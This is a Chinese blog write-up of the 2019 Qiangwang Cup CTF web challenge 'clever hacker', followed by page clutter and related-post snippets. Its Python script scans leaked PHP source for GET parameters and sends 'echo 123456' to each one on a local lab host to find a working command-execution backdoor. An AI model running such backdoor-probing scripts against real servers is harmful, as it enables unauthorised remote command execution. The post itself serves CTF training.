[原题复现]强网杯 2019 WEB高明的黑客

最新推荐文章于 2021-08-15 11:33:50 发布
最新推荐文章于 2021-08-15 11:33:50 发布
阅读量826 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43818995/article/details/104257763
版权

简介

 原题复现:

 考察知识点:python代码编写能力。。。

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

简介

页面提示有源码可以下载,直接拼接URL www.tar.gz  

下载后发现一堆php 初步考虑就是有考察根脚本编写有关

打开代码发现这些 有get、pos 还有var_dump() 每个页面都有很多看WP说这是shell 因为很多都不能用所以要编写一个能检测利用的py

 

v1.0版本(速度太慢)

import re
import os
import requests

files = os.listdir('src/')    #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])')   #设置正则
for i in files:                #从第一个文件开始
    url = "http://127.0.0.1/src/" + i
    f = open("src/"+i)        #打开这个文件
    data = f.read()           #读取文件内容
    f.close()                 #关闭文件
    result = reg.findall(data)  #从文件中找到GET请求
    for j in result:           #从第一个GET参数开始
        payload = url + "?" + j + "=echo 123456"   ##尝试请求次路径,并执行命令
        print(payload)
        html = requests.get(payload)
        if "123456" in html.text:
            print(payload)
            exit(1)

 

 v2.0(加了多线程)

 

 

简介

1

简介

笑花大王
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[强网杯 2019] web-高明黑客
BROTHERYY的博客
07-08 1014
环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
强网杯2019(高明黑客&强网先锋上单)
kid的博客
05-30 5576
强网杯2019(高明黑客&强网先锋上单)   前言 这里主要是对强网web高明黑客和上单两道进行一个回顾 再次感谢大佬提供的场景:https://www.zhaoj.in/read-5873.html   高明黑客 目是先下载给出代码 比赛时拿到这道一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK在...
记2019强网杯_web_高明黑客
fly夏天的博客
10-22 1445
之前参加了2019的强网杯,当时表很菜,很多都不会做。 后来发buuoj.cn上有,以此重新一下这次的目。 话不多说,开始今天的主。 一访问页面就是如下画面: 因此我们直接访问 url/www.tar.gz即可下载获得源码。 打开压缩包,发有3000多个php文件。 尝试搜索flag文件,未果。 打开php文件进行代码审计 发代码中存在一些诸如这样的get或post参数会执行...
2019 第三届强网杯线上赛部分web
weixin_30881367的博客
05-28 644
0x00前言 周末打了强网杯,队伍只做得出来6道签到web有三道我仔细研究了但是没有最终做出来,赛后有在群里看到其他师傅提供了writeup和环境的docker环境,于是跟着学习一波并记录下来 0x01 upload 第一步扫目录发有备份文件 下载下来后大致浏览就清楚是thinkphp5框架,并且没有远程代码执行漏洞 根据目的数据传输情况,可以发在登录后有个us...
2019强网杯部分writeup
Sea_Sand息禅
06-04 5558
Web 1、UPLOAD 环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个注册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
网络安全web方向入门合集
dra_p0p3n's blogs
08-15 3922
这是我大三在实习的时候做的一些目,以后准备搞人工智能方向,应该也不会再接触网安了,就在这里汇总一下之前做的简单吧,虽然简单但是也用了很多功夫去写这些,提高也很大,以此留作纪念吧。
CTFWeb-BUUCTF竞赛真WriteUp(1)
道阻且长,行则将至。
08-20 7813
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真环境: 此处记录下部分 Web 目练习过程。 N0.1 强网杯-高明黑客 1、创建并访问靶机: 2、根据目提示,访问并下载 www.tar.gz: 打开压缩包,发有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
2021强网杯Write-Up真解析之WEB部分(暴力干货,建议收藏)
MachineGunJoe666
06-16 4558
前言: 强网杯作为国内最好的CTF比赛之一,搞安全的博友和初学者都可以去尝试下。首先,里面有很多大神队伍,0x300R、eee、0ops、AAA、NeSE、Nu1L等,真的值得我们去学习。其次,非常感谢强网杯的主办方,这么好的比赛离不开许多师傅们的辛苦,我们应该感恩这么高质量比赛的幕后工作者。最后,作为一枚安全菜鸡,就让我简单下本次比赛的Web目。不喜勿喷,欢迎指正~ 比赛信息 比赛全称:第五届强网杯全国网络安全挑战赛 比赛地址:https://ctf.ichunqiu.com/20.
BUUCTF笔记之Web系列部分WriteUp(三)
克格莫
05-22 5715
1、[CISCN2019 华北赛区 Day2 Web1]Hack World 最近多做做sql注入,感觉自己在这一块还是很菜,进去就给了提示flag在flag表的flag字段
强网杯SQLphp.zip
12-17
【标】"强网杯SQLphp.zip"是一个针对网络安全竞赛——强网杯的解资源包,其中包含了与SQL(结构化查询语言)相关的挑战。这个压缩包特别关注了如何在PHP环境中重这些SQL目。 【描述】描述中的...
强网杯2022 pwn 赛解析.docx
12-18
强网杯2022 Pwn赛解析】 在网络安全竞赛“强网杯”中,Pwn类赛往往考验参赛者对内存安全漏洞利用的理解和技术应用。本涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2019电赛F数纸
03-17
【标】"2019电赛F数纸"涉及的是一个电子竞赛项目,主要目的是设计一个系统来准确地计数纸质材料的数量。在这个项目中,参赛者使用了归一化算法,这是一种处理和分析数据的方法,以确保数据在不同范围内具有可比...
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出等待超时的象。欢迎下载使用,使用过程中如有使用问,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出等待超时的象。欢迎下载使用,使用过程中如有使用问,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出等待超时的象。欢迎下载使用,使用过程中如有使用问,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出等待超时的象。欢迎下载使用,使用过程中如有使用问,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出等待超时的象。欢迎下载使用,使用过程中如有使用问,请及时与我沟通交流,帮你解决!
[毕设]Delphi库管理与试卷自动生成系统.zip
07-27
[毕设]Delphi库管理与试卷自动生成系统
131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+图像识别与定位+该数据集相关的研究论文
07-27
<项目介绍> 包含131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+该数据集相关的研究论文。可供深度学习图像识别与定位。 - 训练集大小:67700 个图像 测试集大小:22888 个图像 文件名格式:image_index_100.jpg(例如 32_100.jpg)或 r_image_index_100.jpg(例如 r_32_100.jpg)或 r2_image_index_100.jpg 或 r3_image_index_100.jpg。 “r”代表旋转水果。 “r2”表示水果绕第三轴旋转。 “100”来自图像尺寸(100x100 像素)。 水果是如何拍摄的: 1:使用 C920 摄像机拍摄水果。最好的网络摄像头之一。 2:在水果后面,我们放了一张白纸作为背景。 3:将水果和蔬菜种植在低速电机(3转/分钟)的轴中,并录制一段20秒的短片。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
Matlab实斑点鬣狗优化算法SHO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测.rar
07-27
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
[毕设]HTTP服务器开发与设计.zip
最新发布
07-27
[毕设]HTTP服务器开发与设计
echarts柱图原生js
08-20
要使用原生JavaScriptECharts柱图,你需要先引入ECharts库,并创建一个DOM元素作为图表的容器。然后,使用JavaScript代码配置图表的数据和样式,最后将图表渲染到容器中。 以下是一个简单的示例代码,演示如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值